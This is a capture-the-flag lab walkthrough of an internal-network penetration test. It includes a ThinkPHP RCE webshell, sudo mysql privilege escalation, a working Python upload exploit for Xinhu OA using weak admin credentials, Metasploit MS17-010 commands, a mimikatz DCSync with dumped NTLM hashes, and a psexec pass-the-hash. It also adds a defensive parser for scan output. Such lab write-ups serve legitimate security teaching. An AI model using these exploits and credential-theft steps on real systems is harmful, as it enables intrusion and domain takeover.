Initial
Target description:
Initial is an easy-difficulty lab environment. Completing the challenge gives players a first look at the basic workflow of an internal network penetration test. The lab has a single flag whose parts are spread across different machines.
Entry point: port scan with fscan
Result:
```
fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.227.140 is alive
[*] Icmp alive hosts len is: 1
39.98.227.140:22 open
39.98.227.140:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.98.227.140 code:200 len:5578 title:Bootstrap Material Admin
[+] http://39.98.227.140 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 13.9123559s
```
The host has the ThinkPHP 5.0.23 RCE vulnerability; exploit it directly and drop a webshell.
Internal network scan results:
```
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.15:22 open
172.22.1.2:139 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
[+] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[+] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[+] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] WebTitle:http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] 172.22.1.21 XIAORANG\XIAORANG-WIN7 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] 172.22.1.2 [+]DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393
[*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
```
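Raw fscan output like the above is hard to act on host by host. The following is an added example parser (my own code, not fscan's) that folds its port, NetInfo, OS, WebTitle and finding lines into one record per host and produces a patch/isolation worklist; the sample text is constructed from a subset of the lines above.

```python
import re
from collections import defaultdict
# Constructed sample in the fscan output format shown above (a subset of its lines).
SAMPLE = """\
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:80 open
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] 172.22.1.21 XIAORANG\\XIAORANG-WIN7 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2 [+]DC XIAORANG\\DC01 Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
NET_RE = re.compile(rf"^\[\*\]{IP}$")                      # "[*]<ip>" inside a NetInfo block
HOST_RE = re.compile(r"^\[->\](\S+)$")                      # first "[->]" after it is the hostname
OS_RE = re.compile(rf"^\[\*\] {IP}( \[\+\]DC)?(?: (\S+\\\S+))? (.+)$")
VULN_RE = re.compile(rf"^\[\+\] (?:https?://)?{IP}\S* (.+)$")  # MS17-010 / poc-yaml findings
TITLE_RE = re.compile(rf"^\[\*\] WebTitle:\s*https?://{IP}\S* .*?title:(.*?)(?: 跳转url.*)?$")

def parse_fscan(text):
    """Fold fscan's per-line output into one record per host."""
    hosts = defaultdict(lambda: {"ports": set(), "hostname": None, "os": None,
                                 "dc": False, "vulns": [], "titles": []})
    pending = None  # ip from the last "[*]<ip>" line, waiting for its "[->]hostname"
    for line in text.splitlines():
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NET_RE.match(line):
            pending = m[1]
        elif (m := HOST_RE.match(line)) and pending:
            hosts[pending]["hostname"] = hosts[pending]["hostname"] or m[1]
        elif m := TITLE_RE.match(line):
            hosts[m[1]]["titles"].append(m[2].strip())
        elif m := OS_RE.match(line):
            h = hosts[m[1]]
            h["dc"], h["os"] = bool(m[2]), m[4].strip("()")
            h["hostname"] = h["hostname"] or (m[3].split("\\")[-1] if m[3] else None)
        elif m := VULN_RE.match(line):
            hosts[m[1]]["vulns"].append(m[2])
    return {ip: {**h, "ports": sorted(h["ports"])} for ip, h in hosts.items()}

def triage(hosts):
    """Hosts with a finding, domain controllers first: the patch/isolation worklist."""
    return sorted((ip for ip, h in hosts.items() if h["vulns"]),
                  key=lambda ip: (not hosts[ip]["dc"], ip))
```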
The first machine needs privilege escalation. Start by listing SUID binaries:

```shell
find / -user root -perm /4000 2>/dev/null
```

sudo is present, so check sudo -l: mysql may be run as root with no password. Escalate directly through mysql with sudo mysql -e '\! cmd':

```shell
sudo mysql -e '\! find / -name flag'
sudo mysql -e '\! cat /root/flag/flag01.txt'
```

This gives the first part of the flag.
The Xinhu OA system has weak credentials: admin/admin123
Xinhu OA also has an RCE:
EXP:
```python
import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
# Step 1: log in as admin (the weak credentials above, base64-encoded as the login form sends them)
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
# Step 2: upload 1.php through the file-upload endpoint
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',   # base64("admin")
    'adminpass': 'YWRtaW4xMjM=',  # base64("admin123")
    'yanzm': ''
}
r = session.post(url1, data=data1)
with open('1.php', 'rb') as f:  # binary mode so the file is sent unchanged
    r = session.post(url2, files={'file': f})
filepath = str(r.json()['filepath'])
# The upload is stored with a .uptemp suffix; after the task below runs it is reachable as .php
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
file_id = r.json()['id']
# Step 3: trigger the qcloudCos task for the uploaded file id
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)
# Step 4: request the renamed file
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)
```
After uploading the shell, the second part of the flag is found in C:/Users/Administrator/flag/
172.22.1.21 is vulnerable to MS17-010; exploit it directly:
```
search ms17
use 0
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
exploit -j
```
Once the session is in, use kiwi to run DCSync:
```
session -1
use kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
```

Output:
```
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1000 DC01$ c4459ccfe941bc3a1835c72070324266 532480
1104 XIAORANG-OA01$ 7d89a53f96224552d90bcc58cc6c6711 4096
1108 XIAORANG-WIN7$ e41d4ce40648363b3cae0236d902260a 4096
```
A pass-the-hash against the DC gives the final part of the flag:

```shell
proxychains4 psexec.py administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codec gbk
```